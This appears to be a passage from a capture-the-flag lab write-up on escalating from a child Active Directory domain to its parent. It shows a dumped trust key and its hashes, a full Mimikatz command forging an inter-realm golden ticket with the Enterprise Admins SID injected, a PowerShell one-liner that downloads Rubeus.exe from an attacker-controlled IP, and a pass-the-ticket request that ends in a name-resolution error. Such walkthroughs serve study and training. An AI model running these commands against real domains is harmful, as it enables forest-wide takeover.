 [In-1] LAB.ENTERPRISE.THM -> MORIMORI.COM

 [Out-1] MORIMORI.COM -> LAB.ENTERPRISE.THM
    * 3/11/2021 7:30:30 PM - CLEAR   - 50 00 61 00 73 00 73 00 77 00 6f 00 72 00 64 00
        * aes256_hmac       a80d035b0775088e8ec1836d43f8b32f4cafca1f31f7c46f1615651dd140f382
        * aes128_hmac       10aac1e975ebdd4edb90692ebb2db502
        * rc4_hmac_nt       a4f49c406510bdcab6824ee7c30fd852

Forge an inter-realm TGT to the parent domain ENTERPRISE.THM

From the output above we know the parent domain's SID is S-1-5-21-1835041512-953509921-1126143443.

Note that the rc4 parameter in the command below must be the trust key enumerated above:
* rc4_hmac_nt d84d2d46e70ebdcd94ec6f3c79f5731f

Forge the TGT:

Invoke-Mimikatz -Command '"Kerberos::golden /user:Administrator /domain:LAB.ENTERPRISE.THM /sid:S-1-5-21-2168718921-3906202695-65158103 /sids:S-1-5-21-1835041512-953509921-1126143443-519 /rc4:d84d2d46e70ebdcd94ec6f3c79f5731f /service:krbtgt /target:ENTERPRISE.THM /ticket:C:\users\bitbucket\Desktop\trust_tkt.kirbi"'

Run it:

PS C:\users\Administrator\Desktop> Invoke-Mimikatz -Command '"Kerberos::golden /user:Administrator /domain:LAB.ENTERPRISE.THM /sid:S-1-5-21-2168718921-3906202695-65158103 /sids:S-1-5-21-1835041512-953509921-1126143443-519 /rc4:d84d2d46e70ebdcd94ec6f3c79f5731f /service:krbtgt /target:ENTERPRISE.THM /ticket:C:\users\bitbucket\Desktop\trust_tkt.kirbi"'

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 20 2021 19:01:18
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` (benjamin@gentilkiwi.com)
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             (vincent.letoux@gmail.com)
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(powershell) # Kerberos::golden /user:Administrator /domain:LAB.ENTERPRISE.THM /sid:S-1-5-21-2168718921-3906202695-65158103 /sids:S-1-5-21-1835041512-953509921-1126143443-519 /rc4:d84d2d46e70ebdcd94ec6f3c79f5731f /service:krbtgt /target:ENTERPRISE.THM /ticket:C:\users\bitbucket\Desktop\trust_tkt.kirbi
User      : Administrator
Domain    : LAB.ENTERPRISE.THM (LAB)
SID       : S-1-5-21-2168718921-3906202695-65158103
User Id   : 500
Groups Id : *513 512 520 518 519
Extra SIDs: S-1-5-21-1835041512-953509921-1126143443-519 ;
ServiceKey: d84d2d46e70ebdcd94ec6f3c79f5731f - rc4_hmac_nt
Service   : krbtgt
Target    : ENTERPRISE.THM
Lifetime  : 3/4/2022 1:37:00 AM ; 3/1/2032 1:37:00 AM ; 3/1/2032 1:37:00 AM
-> Ticket : C:\users\bitbucket\Desktop\trust_tkt.kirbi

 * PAC generated
 * PAC signed
 * EncTicketPart generated
 * EncTicketPart encrypted
 * KrbCred generated

Final Ticket Saved to file !

View the current forest:

PS C:\users\bitbucket\Desktop> Get-NetForest


RootDomainSid         : S-1-5-21-1835041512-953509921-1126143443
Name                  : ENTERPRISE.THM
Sites                 : {Default-First-Site-Name}
Domains               : {ENTERPRISE.THM, LAB.ENTERPRISE.THM}
GlobalCatalogs        : {ENTERPRISE-DC.ENTERPRISE.THM, LAB-DC.LAB.ENTERPRISE.THM}
ApplicationPartitions : {DC=ForestDnsZones,DC=ENTERPRISE,DC=THM, DC=DomainDnsZones,DC=ENTERPRISE,DC=THM, DC=DomainDnsZones,DC=LAB,DC=ENTERPRISE,DC=THM}
ForestModeLevel       : 7
ForestMode            : Unknown
RootDomain            : ENTERPRISE.THM
Schema                : CN=Schema,CN=Configuration,DC=ENTERPRISE,DC=THM
SchemaRoleOwner       : ENTERPRISE-DC.ENTERPRISE.THM
NamingRoleOwner       : ENTERPRISE-DC.ENTERPRISE.THM

We can see that the parent domain's DC is ENTERPRISE-DC.ENTERPRISE.THM.

Transfer Rubeus.exe to the target:

powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.11.63.196/Rubeus.exe','C:\users\bitbucket\Desktop\Rubeus.exe')"

Use Rubeus to try to request a TGS with the forged ticket:

PS C:\users\bitbucket\Desktop> .\Rubeus.exe asktgs /ticket:C:\users\bitbucket\Desktop\trust_tkt.kirbi /service:cifs/ENTERPRISE-DC.ENTERPRISE.THM /dc:ENTERPRISE-DC.ENTERPRISE.THM /ptt

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v1.5.0

[*] Action: Ask TGS

[X] Error resolving hostname 'ENTERPRISE-DC.ENTERPRISE.THM' to an IP address: No such host is known

But it errors out, saying the hostname cannot be resolved.

Searching with PowerView doesn't find it either:

PS C:\users\bitbucket\Desktop> Get-NetComputer -Domain LAB.ENTERPRISE.THM
LAB-DC.LAB.ENTERPRISE.THM
PS C:\users\bitbucket\Desktop> Get-NetComputer -Domain ENTERPRISE.THM
WARNING: Error: Exception calling "FindAll" with "0" argument(s): "A referral was returned from the server."

This is very strange.
